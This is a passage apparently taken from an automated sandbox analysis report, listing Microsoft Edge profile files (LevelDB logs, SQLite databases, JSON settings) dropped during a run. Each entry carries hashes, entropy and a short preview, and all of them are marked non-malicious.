                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                              Entropy (8bit):5.286570772537151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUrMxq2PCHhJ23oH+TcwtzjqEKj0QMxIFUt8YUrL9Zmw+YUrRdMkwOCHhJ23oH+f:vvBYebvqBZFUt8b/+a56YebvqBaJ
                                                                                                                                                                                                                              MD5:6384C7F41FAF3DD00C41CDA97294B1A1
                                                                                                                                                                                                                              SHA1:47EB9B7B9D0CD9960A2FBC10341F795B3E1E82D2
                                                                                                                                                                                                                              SHA-256:EE897EDB1FE343AF6291C9BC11F40379BE55F67A2B504F0F8FDFDAFE6DFBC3E1
                                                                                                                                                                                                                              SHA-512:6DA6514864CF57A1594DDCE004DCD2EA6F5EF3A3EC108317FF37EAC22C6570959DC10E4C9D484E7A89B3D893106D8B42A77EDB31C1BD884B44E9900C0EC0DD55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:50.734 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/18-10:53:50.736 1994 Recovering log #3.2024/11/18-10:53:50.740 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                              Entropy (8bit):5.286570772537151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUrMxq2PCHhJ23oH+TcwtzjqEKj0QMxIFUt8YUrL9Zmw+YUrRdMkwOCHhJ23oH+f:vvBYebvqBZFUt8b/+a56YebvqBaJ
                                                                                                                                                                                                                              MD5:6384C7F41FAF3DD00C41CDA97294B1A1
                                                                                                                                                                                                                              SHA1:47EB9B7B9D0CD9960A2FBC10341F795B3E1E82D2
                                                                                                                                                                                                                              SHA-256:EE897EDB1FE343AF6291C9BC11F40379BE55F67A2B504F0F8FDFDAFE6DFBC3E1
                                                                                                                                                                                                                              SHA-512:6DA6514864CF57A1594DDCE004DCD2EA6F5EF3A3EC108317FF37EAC22C6570959DC10E4C9D484E7A89B3D893106D8B42A77EDB31C1BD884B44E9900C0EC0DD55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:50.734 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/18-10:53:50.736 1994 Recovering log #3.2024/11/18-10:53:50.740 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):325
                                                                                                                                                                                                                              Entropy (8bit):5.234659469825199
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUVvwVq2PCHhJ23oH+TcwtpIFUt8YUUSgZmw+YUUSIkwOCHhJ23oH+Tcwta/WLJ:9vBYebmFUt8SX/+SF56YebaUJ
                                                                                                                                                                                                                              MD5:B98C66CF59BF3C7CBA6E29FA72DF5565
                                                                                                                                                                                                                              SHA1:03411BB904CFF4562B1FC9BB64948609638BAA93
                                                                                                                                                                                                                              SHA-256:DBD26265859332718D071A047F513DA213F3909F25979D13FAF92F7C369A32CF
                                                                                                                                                                                                                              SHA-512:3309DE8041C5C9EC38CF730A9CA7784FB81AEF9E0BB5F0814D1156D0C3A772CDD1EA6D48F548F0C399ED9C9962A18538F200545B8B897FCB4FCE3CBF792E3C07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.237 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/18-10:53:35.238 f20 Recovering log #3.2024/11/18-10:53:35.238 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):325
                                                                                                                                                                                                                              Entropy (8bit):5.234659469825199
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUVvwVq2PCHhJ23oH+TcwtpIFUt8YUUSgZmw+YUUSIkwOCHhJ23oH+Tcwta/WLJ:9vBYebmFUt8SX/+SF56YebaUJ
                                                                                                                                                                                                                              MD5:B98C66CF59BF3C7CBA6E29FA72DF5565
                                                                                                                                                                                                                              SHA1:03411BB904CFF4562B1FC9BB64948609638BAA93
                                                                                                                                                                                                                              SHA-256:DBD26265859332718D071A047F513DA213F3909F25979D13FAF92F7C369A32CF
                                                                                                                                                                                                                              SHA-512:3309DE8041C5C9EC38CF730A9CA7784FB81AEF9E0BB5F0814D1156D0C3A772CDD1EA6D48F548F0C399ED9C9962A18538F200545B8B897FCB4FCE3CBF792E3C07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.237 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/18-10:53:35.238 f20 Recovering log #3.2024/11/18-10:53:35.238 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                              Entropy (8bit):1.2649406643685077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:KrJ/2qOB1nxCkMHSAELyKOMq+8QTQKC+CVum6:K0q+n0JH9ELyKOMq+8Q7l
                                                                                                                                                                                                                              MD5:A5C1C9EACA1E6F2C735AC00B063D6E7D
                                                                                                                                                                                                                              SHA1:27A2DCC19D6830833846FB61D53DF7D307B888B4
                                                                                                                                                                                                                              SHA-256:E1D93E81243C1CC73B0393D9EB68FD23398760B089F0CDF5F5651534A6E0F315
                                                                                                                                                                                                                              SHA-512:7A08F3E8A48C3A92E60807A59CC516D5DAF6F8A76DACE2E6B14968E1B57C2D494ECB8FC5C770477D6D5DB4823C22891F96FD8DB5426031C63825BD7AEC429F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a201e606-265e-4c99-9483-a721ded7c20c.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25029
                                                                                                                                                                                                                              Entropy (8bit):5.566551004421152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:JGrdUSWPs2fYEi58F1+UoAYDCx9Tuqh0VfUC9xbog/OVU1SJUrwqUWpHtuw:JGrdUSWPs2f1Eu1jaRwJNqUit/
                                                                                                                                                                                                                              MD5:CCB25D9BF3CDF2D108B7FB4A69B25217
                                                                                                                                                                                                                              SHA1:9209729D6D8026A857E130BF8715D2587C95C062
                                                                                                                                                                                                                              SHA-256:7472CB3211F2CDF16624306E74A6C19CCE6697F961893A47E26B75E356C7EEBB
                                                                                                                                                                                                                              SHA-512:DA12E6ECD13B9A47FD3607AFB748760EA0861D72FA9D4658D51F683B128120CA3A59DFBA0D8DB888E73850B7090711FD2819583A36D2E01711A001CE74CD5707
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376418815238455","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376418815238455","location":5,"ma

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a8750f8d-073d-4e85-b88e-c9061c28a0f9.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45056
                                                                                                                                                                                                                              Entropy (8bit):0.4604018482746456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8RCLYQcI5fc:TnUYVAKAFXX+HkQcEc
                                                                                                                                                                                                                              MD5:6AD81BE4344EA5AF410DBA189F99F9BB
                                                                                                                                                                                                                              SHA1:0D8F65D3C6D64A172EF51E9C501C23B8C7C442AA
                                                                                                                                                                                                                              SHA-256:1D24AEA9A1742DDAC468BD56E51A3C96C0DB82A6ABF2ECA5CE28723DDE041C9B
                                                                                                                                                                                                                              SHA-512:4BE031206144194C1F3CB59D2227DFEA8742A50EE4057C3B0F9E855D7B3EC91C69EE7CD41B9C9C30C18189F2F2C5F7ED360513BDF4B9EA35A3EEC9A18ADA972C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                              Entropy (8bit):0.05416204572600966
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:GtStutrStutNl/6R9XjhslotGLNl0ml/Vl/XoQXEl:MtVtNl/6L1EjVl/PvoQ
                                                                                                                                                                                                                              MD5:D59594A110D011EF4877BA1CF760F25A
                                                                                                                                                                                                                              SHA1:078B0BA0084E25281CDF35A933EE45F54FC45B67
                                                                                                                                                                                                                              SHA-256:FA10228344AA2914722EEAC144F7F6AB33A09DC33E1D6118913746B043BE6E4C
                                                                                                                                                                                                                              SHA-512:8F13FD9A77217597F1F2F217F09F7FF4C45A21E9C6502FDB12176246D39F9496291991DF64C3F79727684B58F237A67A9136054289AACA4BDE141F32DD95288D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..-.....................<S#..(Y..XE6.:...0..`s<...-.....................<S#..(Y..XE6.:...0..`s<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):86552
                                                                                                                                                                                                                              Entropy (8bit):0.8690733318119963
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:9jUx1uT/r8ZNsZzMNsDKO5NszeRNsdtfbId:kmztFSyMbO
                                                                                                                                                                                                                              MD5:632A6848A8B9939A8C0148A80E56A722
                                                                                                                                                                                                                              SHA1:17E77EC8EE79BF415623C7D04C9A59D2E55AF7E4
                                                                                                                                                                                                                              SHA-256:11E148B07A3FD69241B7E114BA5F0106CD7E976B809B00E26B719B42A2DC7E25
                                                                                                                                                                                                                              SHA-512:10A204252AAED3F40A1293014F5F4495AE821A5354F39915372DCB064568FEAF808320C9CA537911E21C7BCFB1431D4037D9212C22819DD1A98F4D2464773E97
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.244266829192017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUnq2PCHhJ23oH+TcwtfrK+IFUt8YURXZmw+YURFkwOCHhJ23oH+TcwtfrUeLJ:yvBYeb23FUt83/+l56Yeb3J
                                                                                                                                                                                                                              MD5:605B72E9AD5028F598E7F9FC40D642CA
                                                                                                                                                                                                                              SHA1:BE6F0B48A28A9638B822FAE0E7C7C50B8876B69C
                                                                                                                                                                                                                              SHA-256:EEC142E1C419FDBB5A6C67D78F8CD4864AEFC4AA2271193601194C107BA4E50C
                                                                                                                                                                                                                              SHA-512:C3BD8E4C33ACCA26D176DE45A471F3BEC7F67B5AD18D0C771FDC97C40A9C822B85E2DDD3461B9306EC36CFD964ABCC591DFE0E3F9A2B1C5B40B436D9E7EC58D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.316 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/18-10:53:36.317 1f34 Recovering log #3.2024/11/18-10:53:36.317 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.244266829192017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUnq2PCHhJ23oH+TcwtfrK+IFUt8YURXZmw+YURFkwOCHhJ23oH+TcwtfrUeLJ:yvBYeb23FUt83/+l56Yeb3J
                                                                                                                                                                                                                              MD5:605B72E9AD5028F598E7F9FC40D642CA
                                                                                                                                                                                                                              SHA1:BE6F0B48A28A9638B822FAE0E7C7C50B8876B69C
                                                                                                                                                                                                                              SHA-256:EEC142E1C419FDBB5A6C67D78F8CD4864AEFC4AA2271193601194C107BA4E50C
                                                                                                                                                                                                                              SHA-512:C3BD8E4C33ACCA26D176DE45A471F3BEC7F67B5AD18D0C771FDC97C40A9C822B85E2DDD3461B9306EC36CFD964ABCC591DFE0E3F9A2B1C5B40B436D9E7EC58D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.316 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/18-10:53:36.317 1f34 Recovering log #3.2024/11/18-10:53:36.317 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                              Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                              MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                              SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                              SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                              SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                              Entropy (8bit):5.2268511826871125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUdUXq2PCHhJ23oH+TcwtfrzAdIFUt8YUHDWZmw+YU4PkwOCHhJ23oH+TcwtfrzS:NvBYeb9FUt8JW/+G56Yeb2J
                                                                                                                                                                                                                              MD5:720F0D9A9F58053D69861B99D3C9D8CD
                                                                                                                                                                                                                              SHA1:7D1013550DB4FC06188E26947344FBF445F27E4F
                                                                                                                                                                                                                              SHA-256:682F97B819237018535B63E10F71B2119D84375832A9E6C82F48FCD31E52594A
                                                                                                                                                                                                                              SHA-512:F42A01D2F8282B6EF522B9E5DB7BCB017B08BB14C25EF2DA42122D1E91A5D0A56CF03D104D2554600AAE21E37B2B8A39ACA3B05BC7AFE1B5C3EB973DEFB9B3E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.241 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/18-10:53:36.305 1f34 Recovering log #3.2024/11/18-10:53:36.307 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

